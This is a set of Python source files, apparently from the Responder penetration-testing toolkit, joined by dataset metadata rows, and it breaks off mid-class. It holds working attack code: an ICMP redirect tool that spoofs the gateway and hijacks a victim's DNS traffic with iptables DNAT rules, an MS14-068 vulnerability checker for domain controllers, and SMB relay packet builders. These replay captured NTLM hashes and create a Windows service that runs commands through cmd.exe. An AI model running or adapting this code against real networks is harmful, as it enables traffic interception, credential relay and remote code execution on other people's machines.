# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import struct
import optparse
import pipes
import sys
from socket import *
sys.path.append('../')
from odict import OrderedDict
from random import randrange
from time import sleep
from subprocess import call
from packets import Packet
parser = optparse.OptionParser(usage='python %prog -I eth0 -i 10.20.30.40 -g 10.20.30.254 -t 10.20.30.48 -r 10.20.40.1',
prog=sys.argv[0],
)
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
parser.add_option('-g', '--gateway',action="store", help="The ip address of the original gateway (issue the command 'route -n' to know where is the gateway", metavar="10.20.30.254",dest="OriginalGwAddr")
parser.add_option('-t', '--target',action="store", help="The ip address of the target", metavar="10.20.30.48",dest="VictimIP")
parser.add_option('-r', '--route',action="store", help="The ip address of the destination target, example: DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost")
parser.add_option('-s', '--secondaryroute',action="store", help="The ip address of the destination target, example: Secondary DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost2")
parser.add_option('-I', '--interface',action="store", help="Interface name to use, example: eth0", metavar="eth0",dest="Interface")
parser.add_option('-a', '--alternate',action="store", help="The alternate gateway, set this option if you wish to redirect the victim traffic to another host than yours", metavar="10.20.30.40",dest="AlternateGwAddr")
options, args = parser.parse_args()
if options.OURIP is None:
print "-i mandatory option is missing.\n"
parser.print_help()
exit(-1)
elif options.OriginalGwAddr is None:
print "-g mandatory option is missing, please provide the original gateway address.\n"
parser.print_help()
exit(-1)
elif options.VictimIP is None:
print "-t mandatory option is missing, please provide a target.\n"
parser.print_help()
exit(-1)
elif options.Interface is None:
print "-I mandatory option is missing, please provide your network interface.\n"
parser.print_help()
exit(-1)
elif options.ToThisHost is None:
print "-r mandatory option is missing, please provide a destination target.\n"
parser.print_help()
exit(-1)
if options.AlternateGwAddr is None:
AlternateGwAddr = options.OURIP
#Setting some vars.
OURIP = options.OURIP
OriginalGwAddr = options.OriginalGwAddr
AlternateGwAddr = options.AlternateGwAddr
VictimIP = options.VictimIP
ToThisHost = options.ToThisHost
ToThisHost2 = options.ToThisHost2
Interface = options.Interface
def Show_Help(ExtraHelpData):
    """Print the tool banner followed by caller-supplied usage notes."""
    banner = ("\nICMP Redirect Utility 0.1.\n"
              "Created by Laurent Gaffie, please send bugs/comments to laurent.gaffie@gmail.com\n"
              "\n"
              "This utility combined with Responder is useful when you're sitting on a Windows based network.\n"
              "Most Linux distributions discard by default ICMP Redirects.\n")
    print(banner)
    print(ExtraHelpData)
MoreHelp = "Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP)
def GenCheckSum(data):
    """Compute the 16-bit ones'-complement checksum used by IP/ICMP.

    data -- packet bytes as a Python 2 str.  Odd-length input is now
            accepted: per the standard checksum rule the trailing byte is
            padded with a zero (the original raised IndexError on it).
            Even-length output is unchanged.

    Returns the checksum packed as a little-endian 2-byte string, ready to
    be dropped into a header field.
    """
    if len(data) % 2:
        data += "\x00"  # pad the final odd byte with zero
    s = 0
    for i in range(0, len(data), 2):
        # Combine each byte pair little-endian, then fold the carry back
        # into the low 16 bits (end-around carry).
        word = ord(data[i]) + (ord(data[i+1]) << 8)
        total = s + word
        s = (total & 0xffff) + (total >> 16)
    return struct.pack("<H", ~s & 0xffff)
#####################################################################
#ARP Packets
#####################################################################
class EthARP(Packet):
    """Ethernet frame header for ARP: broadcast destination, EtherType 0x0806.
    SrcMac must be filled in by the caller (see ReceiveArpFrame)."""
    fields = OrderedDict([
        ("DstMac", "\xff\xff\xff\xff\xff\xff"),
        ("SrcMac", ""),
        ("Type", "\x08\x06" ), #ARP
    ])
class ARPWhoHas(Packet):
    """ARP who-has request for IPv4 over Ethernet (opcode 1).

    calculate() packs DstIP (the queried host) and overwrites SenderIP with
    the module-level OURIP — the odd SenderIP default below is never sent.
    """
    fields = OrderedDict([
        ("HwType", "\x00\x01"),
        ("ProtoType", "\x08\x00" ), #IP
        ("MacLen", "\x06"),
        ("IPLen", "\x04"),
        ("OpCode", "\x00\x01"),
        ("SenderMac", ""),
        ("SenderIP", "\x00\xff\x53\x4d"),
        ("DstMac", "\x00\x00\x00\x00\x00\x00"),
        ("DstIP", "\x00\x00\x00\x00"),
    ])
    def calculate(self):
        # Convert dotted-quad strings to 4-byte network order.
        self.fields["DstIP"] = inet_aton(self.fields["DstIP"])
        self.fields["SenderIP"] = inet_aton(OURIP)
#####################################################################
#ICMP Redirect Packets
#####################################################################
class Eth2(Packet):
    """Ethernet frame header for IPv4 traffic (EtherType 0x0800); both MAC
    addresses are supplied by the caller."""
    fields = OrderedDict([
        ("DstMac", ""),
        ("SrcMac", ""),
        ("Type", "\x08\x00" ), #IP
    ])
class IPPacket(Packet):
    """Minimal IPv4 header (20 bytes, no options) plus payload in Data.

    calculate() randomizes the IP identification field, converts the
    dotted-quad addresses, recomputes the total length, and fills in the
    header checksum via GenCheckSum().  Cmd is the protocol number
    (\\x01 = ICMP by default; callers pass \\x11 for UDP).
    """
    fields = OrderedDict([
        ("VLen", "\x45"),
        ("DifField", "\x00"),
        ("Len", "\x00\x38"),
        ("TID", "\x25\x25"),
        ("Flag", "\x00"),
        ("FragOffset", "\x00"),
        ("TTL", "\x1d"),
        ("Cmd", "\x01"), #ICMP
        ("CheckSum", "\x00\x00"),
        ("SrcIP", ""),
        ("DestIP", ""),
        ("Data", ""),
    ])
    def calculate(self):
        # Random 16-bit IP identification.
        self.fields["TID"] = chr(randrange(256))+chr(randrange(256))
        self.fields["SrcIP"] = inet_aton(str(self.fields["SrcIP"]))
        self.fields["DestIP"] = inet_aton(str(self.fields["DestIP"]))
        # Calc Len First (header + payload, big-endian 16-bit).
        CalculateLen = str(self.fields["VLen"])+str(self.fields["DifField"])+str(self.fields["Len"])+str(self.fields["TID"])+str(self.fields["Flag"])+str(self.fields["FragOffset"])+str(self.fields["TTL"])+str(self.fields["Cmd"])+str(self.fields["CheckSum"])+str(self.fields["SrcIP"])+str(self.fields["DestIP"])+str(self.fields["Data"])
        self.fields["Len"] = struct.pack(">H", len(CalculateLen))
        # Then CheckSum this packet (header fields only, checksum field
        # still zero at this point, as the algorithm requires).
        CheckSumCalc =str(self.fields["VLen"])+str(self.fields["DifField"])+str(self.fields["Len"])+str(self.fields["TID"])+str(self.fields["Flag"])+str(self.fields["FragOffset"])+str(self.fields["TTL"])+str(self.fields["Cmd"])+str(self.fields["CheckSum"])+str(self.fields["SrcIP"])+str(self.fields["DestIP"])
        self.fields["CheckSum"] = GenCheckSum(CheckSumCalc)
class ICMPRedir(Packet):
    """ICMP Redirect message (type 5, code 1: redirect for host).

    GwAddr is overwritten with the module-level OURIP in calculate();
    Data must carry the offending IP header + 8 payload bytes, per the
    ICMP redirect format.
    """
    fields = OrderedDict([
        ("Type", "\x05"),
        ("OpCode", "\x01"),
        ("CheckSum", "\x00\x00"),
        ("GwAddr", ""),
        ("Data", ""),
    ])
    def calculate(self):
        # Advertise ourselves as the new gateway.
        self.fields["GwAddr"] = inet_aton(OURIP)
        # ICMP checksum spans the whole message, checksum field zeroed.
        CheckSumCalc =str(self.fields["Type"])+str(self.fields["OpCode"])+str(self.fields["CheckSum"])+str(self.fields["GwAddr"])+str(self.fields["Data"])
        self.fields["CheckSum"] = GenCheckSum(CheckSumCalc)
class DummyUDP(Packet):
    """Empty UDP datagram (DNS port 53 -> 53) embedded in the redirect's
    quoted packet so the victim associates the new route with DNS traffic."""
    fields = OrderedDict([
        ("SrcPort", "\x00\x35"), #port 53
        ("DstPort", "\x00\x35"),
        ("Len", "\x00\x08"), #Always 8 in this case.
        ("CheckSum", "\x00\x00"), #CheckSum disabled.
    ])
def ReceiveArpFrame(DstAddr):
    """Resolve DstAddr's MAC address with a raw ARP who-has broadcast.

    Returns (PrintMac, DstMac): the colon-separated printable form and the
    raw 6-byte address.  Exits the process if no reply arrives within the
    5-second timeout (bare except also swallows send/recv errors).
    """
    s = socket(AF_PACKET, SOCK_RAW)
    s.settimeout(5)
    Protocol = 0x0806
    s.bind((Interface, Protocol))
    # Our own MAC comes from the bound interface.
    OurMac = s.getsockname()[4]
    Eth = EthARP(SrcMac=OurMac)
    Arp = ARPWhoHas(DstIP=DstAddr,SenderMac=OurMac)
    Arp.calculate()
    final = str(Eth)+str(Arp)
    try:
        s.send(final)
        data = s.recv(1024)
        # Sender MAC of the ARP reply sits at bytes 22..27 of the frame.
        DstMac = data[22:28]
        DestMac = DstMac.encode('hex')
        PrintMac = ":".join([DestMac[x:x+2] for x in xrange(0, len(DestMac), 2)])
        return PrintMac,DstMac
    except:
        print "[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr)
        exit(1)
def IcmpRedirectSock(DestinationIP):
    """Poison the victim's route to DestinationIP with one ICMP redirect.

    Builds: Ethernet (spoofed from the real router's MAC) > IP (spoofed
    from the original gateway) > ICMP redirect advertising AlternateGwAddr,
    quoting a dummy victim->destination UDP/53 packet so the victim's stack
    accepts the redirect as relevant.
    """
    # Resolve both MACs first: victim (frame destination) and real router
    # (spoofed frame source).
    PrintMac,DestMac = ReceiveArpFrame(VictimIP)
    print '[ARP]Target Mac address is :',PrintMac
    PrintMac,RouterMac = ReceiveArpFrame(OriginalGwAddr)
    print '[ARP]Router Mac address is :',PrintMac
    s = socket(AF_PACKET, SOCK_RAW)
    Protocol = 0x0800
    s.bind((Interface, Protocol))
    Eth = Eth2(DstMac=DestMac,SrcMac=RouterMac)
    # Inner (quoted) IP+UDP packet the redirect claims to be about.
    IPPackUDP = IPPacket(Cmd="\x11",SrcIP=VictimIP,DestIP=DestinationIP,TTL="\x40",Data=str(DummyUDP()))
    IPPackUDP.calculate()
    ICMPPack = ICMPRedir(GwAddr=AlternateGwAddr,Data=str(IPPackUDP))
    ICMPPack.calculate()
    # Outer IP packet appears to come from the original gateway.
    IPPack = IPPacket(SrcIP=OriginalGwAddr,DestIP=VictimIP,TTL="\x40",Data=str(ICMPPack))
    IPPack.calculate()
    final = str(Eth)+str(IPPack)
    s.send(final)
    print '\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,DestinationIP)
def FindWhatToDo(ToThisHost2):
    """Dispatch on whether a secondary destination (-s) was supplied.

    With a secondary host: automatic mode — install iptables rules and
    re-poison both routes forever (RunThisInLoop never returns).
    Without one: print the manual-mode help, poison the single route once,
    and exit.
    """
    if ToThisHost2 is not None:  # idiom fix: was "!= None"
        Show_Help('Hit CRTL-C to kill this script')
        RunThisInLoop(ToThisHost, ToThisHost2,OURIP)
    else:
        Show_Help(MoreHelp)
        IcmpRedirectSock(DestinationIP=ToThisHost)
        exit()
def RunThisInLoop(host, host2, ip):
dns1 = pipes.quote(host)
dns2 = pipes.quote(host2)
ouripadd = pipes.quote(ip)
call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns1+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns2+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
print "[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers."
while True:
IcmpRedirectSock(DestinationIP=dns1)
IcmpRedirectSock(DestinationIP=dns2)
print "[+]Repoisoning the target in 8 minutes..."
sleep(480)
FindWhatToDo(ToThisHost2)
| 10,516 | Python | .py | 217 | 43.152074 | 413 | 0.64244 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,392 | FindSMB2UPTime.py | SpiderLabs_Responder/tools/FindSMB2UPTime.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import datetime
import struct
import socket
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '..')))
from packets import SMB2Header, SMB2Nego, SMB2NegoData
def GetBootTime(data):
    """Decode an 8-byte little-endian Windows FILETIME into the boot time.

    FILETIME counts 100ns intervals since 1601-01-01; subtracting the
    epoch offset and dividing by 10**7 yields Unix seconds. Returns a
    (datetime, "YYYY-MM-DD HH:MM:SS") pair.
    """
    filetime = int(struct.unpack('<q', data)[0])
    seconds, _fraction = divmod(filetime - 116444736000000000, 10000000)
    boot = datetime.datetime.fromtimestamp(seconds)
    return boot, boot.strftime('%Y-%m-%d %H:%M:%S')
def IsDCVuln(t):
Date = datetime.datetime(2014, 11, 17, 0, 30)
if t[0] < Date:
print "DC is up since:", t[1]
print "This DC is vulnerable to MS14-068"
print "DC is up since:", t[1]
def run(host):
    """Connect to host (an (ip, 445) tuple), negotiate SMB, and check uptime.

    Sends an SMB1-framed negotiate that offers SMB2; the first protocol byte
    of the reply tells us which dialect the server chose. For SMB2 replies
    the server boot time is read from the negotiate response and checked
    against the MS14-068 patch date.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(host)
    s.settimeout(5)
    Header = SMB2Header(Cmd="\x72",Flag1="\x18",Flag2="\x53\xc8")
    Nego = SMB2Nego(Data = SMB2NegoData())
    Nego.calculate()
    Packet = str(Header)+str(Nego)
    # NetBIOS session service: 4-byte big-endian length prefix.
    Buffer = struct.pack(">i", len(Packet)) + Packet
    s.send(Buffer)
    try:
        data = s.recv(1024)
        # Offset 4 is the protocol magic: \xff 'SMB' = SMB1, \xfe 'SMB' = SMB2.
        if data[4:5] == "\xff":
            print "This host doesn't support SMBv2"
        if data[4:5] == "\xfe":
            # NOTE(review): offset 116 is assumed to be the SystemTime field
            # of the SMB2 NEGOTIATE response -- confirm against [MS-SMB2].
            IsDCVuln(GetBootTime(data[116:124]))
    except Exception:
        s.close()
        raise
if __name__ == "__main__":
    # Exactly one argument is required: the domain controller's address.
    if len(sys.argv) <= 1:
        sys.exit('Usage: python '+sys.argv[0]+' DC-IP-address')
    target = (sys.argv[1], 445)
    run(target)
| 2,160 | Python | .py | 58 | 33.103448 | 83 | 0.681166 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,393 | RelayPackets.py | SpiderLabs_Responder/tools/RelayPackets.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
import sys
sys.path.append('../')
from odict import OrderedDict
from packets import Packet
class SMBHeader(Packet):
    # Standard 32-byte SMB1 header (follows the 4-byte NetBIOS length
    # prefix). All multi-byte fields are raw wire bytes, little-endian.
    fields = OrderedDict([
        ("proto", "\xff\x53\x4d\x42"),   # magic: \xff 'SMB'
        ("cmd", "\x72"),                 # default: Negotiate Protocol
        ("errorcode", "\x00\x00\x00\x00"),
        ("flag1", "\x00"),
        ("flag2", "\x00\x00"),
        ("pidhigh", "\x00\x00"),
        ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
        ("reserved", "\x00\x00"),
        ("tid", "\x00\x00"),
        ("pid", "\x00\x00"),
        ("uid", "\x00\x00"),
        ("mid", "\x00\x00"),
    ])
class SMBNego(Packet):
    # Negotiate Protocol request body: word count, byte count, then the
    # dialect list carried in Data.
    fields = OrderedDict([
        ("Wordcount", "\x00"),
        ("Bcc", "\x62\x00"),
        ("Data", "")
    ])
    def calculate(self):
        # Byte count = length of the serialized dialect list.
        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
class SMBNegoData(Packet):
    # Dialect list for the negotiate request. Each entry is a 0x02
    # buffer-format byte followed by a NUL-terminated dialect string;
    # the hex blobs below spell the standard dialect names.
    fields = OrderedDict([
        ("Separator1","\x02" ),
        ("Dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),  # "PC NETWORK PROGRAM 1.0"
        ("Separator2","\x02"),
        ("Dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),  # "LANMAN1.0"
        ("Separator3","\x02"),
        ("Dialect3", "\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),  # "Windows for Workgroups 3.1a"
        ("Separator4","\x02"),
        ("Dialect4", "\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),  # "LM1.2X002"
        ("Separator5","\x02"),
        ("Dialect5", "\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),  # "LANMAN2.1"
        ("Separator6","\x02"),
        ("Dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),  # "NT LM 0.12"
    ])
class SMBSessionTreeData(Packet):
    # Combined Session Setup AndX + Tree Connect AndX request used to replay
    # captured NTLM hashes against the relay target in a single packet.
    # The AndX chaining means the tree-connect half starts at Wordcount2.
    fields = OrderedDict([
        ("Wordcount", "\x0d"),
        ("AndXCommand", "\x75"),          # next command: Tree Connect AndX
        ("Reserved", "\x00" ),
        ("Andxoffset", "\x7c\x00"),       # recomputed in calculate()
        ("Maxbuff","\x04\x11"),
        ("Maxmpx", "\x32\x00"),
        ("Vcnum","\x00\x00"),
        ("Sessionkey", "\x00\x00\x00\x00"),
        ("AnsiPassLength","\x18\x00"),
        ("UnicodePassLength", "\x00\x00"),
        ("Reserved2","\x00\x00\x00\x00"),
        ("Capabilities", "\xd4\x00\x00\x00"),
        ("Bcc","\x3f\x00"),
        # Default hashes below are placeholders; the relay overwrites them
        # with the victim's captured LM/NTLM responses.
        ("AnsiPasswd", "\xe3\xa7\x10\x56\x58\xed\x92\xa1\xea\x9d\x55\xb1\x63\x99\x7f\xbe\x1c\xbd\x6c\x0a\xf8\xef\xb2\x89"),
        ("UnicodePasswd", "\xe3\xa7\x10\x56\x58\xed\x92\xa1\xea\x9d\x55\xb1\x63\x99\x7f\xbe\x1c\xbd\x6c\x0a\xf8\xef\xb2\x89"),
        ("Username","Administrator"),
        ("UsernameTerminator","\x00\x00"),
        ("Domain","SMB"),
        ("DomainTerminator","\x00\x00"),
        ("Nativeos",""),
        ("NativeosTerminator","\x00\x00"),
        ("Lanmanager",""),
        ("LanmanagerTerminator","\x00\x00\x00"),
        # --- Tree Connect AndX half ---
        ("Wordcount2","\x04"),
        ("Andxcmd2","\xff"),              # 0xff = no further chained command
        ("Reserved3","\x00"),
        ("Andxoffset2","\x06\x01"),
        ("Flags","\x08\x00"),
        ("PasswordLength","\x01\x00"),
        ("Bcc2","\x19\x00"),
        ("Passwd","\x00"),
        ("PrePath","\\\\"),
        ("Targ", "CSCDSFCS"),             # overwritten with the target host
        ("IPC", "\\IPC$"),
        ("TerminatorPath","\x00\x00"),
        ("Service","?????"),              # "?????" = any service type
        ("TerminatorService","\x00"),
    ])
    def calculate(self):
        ##Convert first
        # Strings must be converted to UTF-16 before any length is measured.
        # NOTE(review): Username/Domain/Nativeos/Lanmanager use utf-16be while
        # the path fields use utf-16le -- looks inconsistent with the SMB
        # wire format (little-endian); confirm against a packet capture.
        self.fields["Username"] = self.fields["Username"].encode('utf-16be')
        self.fields["Domain"] = self.fields["Domain"].encode('utf-16be')
        self.fields["Nativeos"] = self.fields["Nativeos"].encode('utf-16be')
        self.fields["Lanmanager"] = self.fields["Lanmanager"].encode('utf-16be')
        self.fields["PrePath"] = self.fields["PrePath"].encode('utf-16le')
        self.fields["Targ"] = self.fields["Targ"].encode('utf-16le')
        self.fields["IPC"] = self.fields["IPC"].encode('utf-16le')
        ##Then calculate
        # data1 = session-setup payload, data2 = tree-connect payload.
        data1= str(self.fields["AnsiPasswd"])+(self.fields["UnicodePasswd"])+str(self.fields["Username"])+str(self.fields["UsernameTerminator"])+str(self.fields["Domain"])+str(self.fields["DomainTerminator"])+str(self.fields["Nativeos"])+str(self.fields["NativeosTerminator"])+str(self.fields["Lanmanager"])+str(self.fields["LanmanagerTerminator"])
        data2= str(self.fields["Passwd"])+str(self.fields["PrePath"])+str(self.fields["Targ"])+str(self.fields["IPC"])+str(self.fields["TerminatorPath"])+str(self.fields["Service"])+str(self.fields["TerminatorService"])
        self.fields["Bcc"] = struct.pack("<h",len(data1))
        self.fields["Bcc2"] = struct.pack("<h",len(data2))
        # AndX offset: 32-byte SMB header + 29 bytes of fixed session-setup
        # words + the variable payload.
        self.fields["Andxoffset"] = struct.pack("<h",len(data1)+32+29)
        self.fields["AnsiPassLength"] = struct.pack("<h",len(str(self.fields["AnsiPasswd"])))
        self.fields["UnicodePassLength"] = struct.pack("<h",len(str(self.fields["UnicodePasswd"])))
        self.fields["PasswordLength"] = struct.pack("<h",len(str(self.fields["Passwd"])))
class SMBNTCreateData(Packet):
    # NT Create AndX request opening the \svcctl named pipe (the Service
    # Control Manager endpoint) on the already-connected IPC$ tree.
    fields = OrderedDict([
        ("Wordcount", "\x18"),
        ("AndXCommand", "\xff"),   # no chained command
        ("Reserved", "\x00" ),
        ("Andxoffset", "\x00\x00"),
        ("Reserved2", "\x00"),
        ("FileNameLen", "\x07\x00"),     # recomputed in calculate()
        ("CreateFlags", "\x16\x00\x00\x00"),
        ("RootFID", "\x00\x00\x00\x00"),
        ("AccessMask", "\x00\x00\x00\x02"),
        ("AllocSize", "\x00\x00\x00\x00\x00\x00\x00\x00"),
        ("FileAttrib", "\x00\x00\x00\x00"),
        ("ShareAccess", "\x07\x00\x00\x00"),
        ("Disposition", "\x01\x00\x00\x00"),  # open existing
        ("CreateOptions", "\x00\x00\x00\x00"),
        ("Impersonation", "\x02\x00\x00\x00"),
        ("SecurityFlags", "\x00"),
        ("Bcc", "\x08\x00"),
        ("FileName", "\\svcctl"),
        ("FileNameNull", "\x00"),
    ])
    def calculate(self):
        # Byte count covers the file name plus its NUL terminator.
        Data1= str(self.fields["FileName"])+str(self.fields["FileNameNull"])
        self.fields["FileNameLen"] = struct.pack("<h",len(str(self.fields["FileName"])))
        self.fields["Bcc"] = struct.pack("<h",len(Data1))
class SMBReadData(Packet):
    # Read AndX request used to pull DCE/RPC responses back out of the
    # \svcctl pipe (FID is filled in from the NT Create response).
    fields = OrderedDict([
        ("Wordcount", "\x0a"),
        ("AndXCommand", "\xff"),   # no chained command
        ("Reserved", "\x00" ),
        ("Andxoffset", "\x00\x00"),
        ("FID", "\x00\x00"),
        ("Offset", "\x19\x03\x00\x00"),
        ("MaxCountLow", "\xed\x01"),
        ("MinCount", "\xed\x01"),
        ("Hidden", "\xff\xff\xff\xff"),
        ("Remaining", "\x00\x00"),
        ("Bcc", "\x00\x00"),
        ("Data", ""),
    ])
    def calculate(self):
        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
class SMBWriteData(Packet):
    # Write AndX request carrying a DCE/RPC PDU into the \svcctl pipe.
    # Length fields are recomputed from Data in calculate().
    fields = OrderedDict([
        ("Wordcount", "\x0e"),
        ("AndXCommand", "\xff"),   # no chained command
        ("Reserved", "\x00" ),
        ("Andxoffset", "\x00\x00"),
        ("FID", "\x06\x40"),
        ("Offset", "\xea\x03\x00\x00"),
        ("Reserved2", "\xff\xff\xff\xff"),
        ("WriteMode", "\x08\x00"),   # write-through on a named pipe
        ("Remaining", "\xdc\x02"),
        ("DataLenHi", "\x00\x00"),
        ("DataLenLow", "\xdc\x02"),
        ("DataOffset", "\x3f\x00"),
        ("HiOffset", "\x00\x00\x00\x00"),
        ("Bcc", "\xdc\x02"),
        ("Data", ""),
    ])
    def calculate(self):
        self.fields["Remaining"] = struct.pack("<h",len(str(self.fields["Data"])))
        self.fields["DataLenLow"] = struct.pack("<h",len(str(self.fields["Data"])))
        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
class SMBDCEData(Packet):
    # DCE/RPC bind PDU (PacketType 0x0b) requesting the SVCCTL interface
    # (the CTX0UID below is the SVCCTL abstract-syntax UUID, the second
    # UUID is the NDR transfer syntax).
    fields = OrderedDict([
        ("Version", "\x05"),
        ("VersionLow", "\x00"),
        ("PacketType", "\x0b"),    # bind
        ("PacketFlag", "\x03"),    # first frag | last frag
        ("DataRepresent", "\x10\x00\x00\x00"),
        ("FragLen", "\x2c\x02"),   # recomputed in calculate()
        ("AuthLen", "\x00\x00"),
        ("CallID", "\x00\x00\x00\x00"),
        ("MaxTransFrag", "\xd0\x16"),
        ("MaxRecvFrag", "\xd0\x16"),
        ("GroupAssoc", "\x00\x00\x00\x00"),
        ("CTXNumber", "\x01"),
        ("CTXPadding", "\x00\x00\x00"),
        ("CTX0ContextID", "\x00\x00"),
        ("CTX0ItemNumber", "\x01\x00"),
        ("CTX0UID", "\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03"),
        ("CTX0UIDVersion", "\x02\x00"),
        ("CTX0UIDVersionlo","\x00\x00"),
        ("CTX0UIDSyntax", "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60"),
        ("CTX0UIDSyntaxVer","\x02\x00\x00\x00"),
    ])
    def calculate(self):
        # FragLen is the total length of the serialized bind PDU.
        Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["MaxTransFrag"])+str(self.fields["MaxRecvFrag"])+str(self.fields["GroupAssoc"])+str(self.fields["CTXNumber"])+str(self.fields["CTXPadding"])+str(self.fields["CTX0ContextID"])+str(self.fields["CTX0ItemNumber"])+str(self.fields["CTX0UID"])+str(self.fields["CTX0UIDVersion"])+str(self.fields["CTX0UIDVersionlo"])+str(self.fields["CTX0UIDSyntax"])+str(self.fields["CTX0UIDSyntaxVer"])
        self.fields["FragLen"] = struct.pack("<h",len(Data1))
class SMBDCEPacketData(Packet):
    # DCE/RPC request PDU (PacketType 0x00) wrapping one SVCCTL operation;
    # Opnum selects the operation (e.g. 0x0f OpenSCManagerW, 0x0c
    # CreateServiceW, 0x10 OpenServiceW, 0x13 StartServiceW).
    fields = OrderedDict([
        ("Version", "\x05"),
        ("VersionLow", "\x00"),
        ("PacketType", "\x00"),    # request
        ("PacketFlag", "\x03"),    # first frag | last frag
        ("DataRepresent", "\x10\x00\x00\x00"),
        ("FragLen", "\x2c\x02"),   # recomputed in calculate()
        ("AuthLen", "\x00\x00"),
        ("CallID", "\x00\x00\x00\x00"),
        ("AllocHint", "\x38\x00\x00\x00"),
        ("ContextID", "\x00\x00"),
        ("Opnum", "\x0f\x00"),
        ("Data", ""),
    ])
    def calculate(self):
        Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["AllocHint"])+str(self.fields["ContextID"])+str(self.fields["Opnum"])+str(self.fields["Data"])
        self.fields["FragLen"] = struct.pack("<h",len(Data1))
        self.fields["AllocHint"] = struct.pack("<i",len(str(self.fields["Data"])))
class SMBDCESVCCTLOpenManagerW(Packet):
    # Stub data for SVCCTL OpenSCManagerW: machine name (ignored by the
    # server), NULL database pointer, and full-access mask.
    fields = OrderedDict([
        ("MachineNameRefID", "\xb5\x97\xb9\xbc"),
        ("MaxCount", "\x0f\x00\x00\x00"),
        ("Offset", "\x00\x00\x00\x00"),
        ("ActualCount", "\x0f\x00\x00\x00"),
        ("MachineName", "\\\\169.220.1.11"),##This is not taken into consideration.
        ("MachineNameNull", "\x00\x00\x00\x00"),
        ("DbPointer", "\x00\x00\x00\x00"),
        ("AccessMask", "\x3f\x00\x0f\x00"),   # SC_MANAGER_ALL_ACCESS
    ])
    def calculate(self):
        ## Convert to UTF-16LE
        self.fields["MachineName"] = self.fields["MachineName"].encode('utf-16le')
class SMBDCESVCCTLCreateService(Packet):
    # Stub data for SVCCTL CreateServiceW: registers a service whose binary
    # path is "%COMSPEC% /C <command>", i.e. runs the relayed command via
    # cmd.exe when the service is started.
    fields = OrderedDict([
        ("ContextHandle", ""),     # SCM handle from OpenSCManagerW
        ("MaxCount", "\x0c\x00\x00\x00"),
        ("Offset", "\x00\x00\x00\x00"),
        ("ActualCount", "\x0c\x00\x00\x00"),
        ("ServiceName", "AyAGaxwLhCP"),       # randomized by the caller
        ("MachineNameNull", "\x00\x00"),
        ("ReferentID", "\x9c\xfa\x9a\xc9"),
        ("MaxCountRefID", "\x11\x00\x00\x00"),
        ("OffsetID", "\x00\x00\x00\x00"),
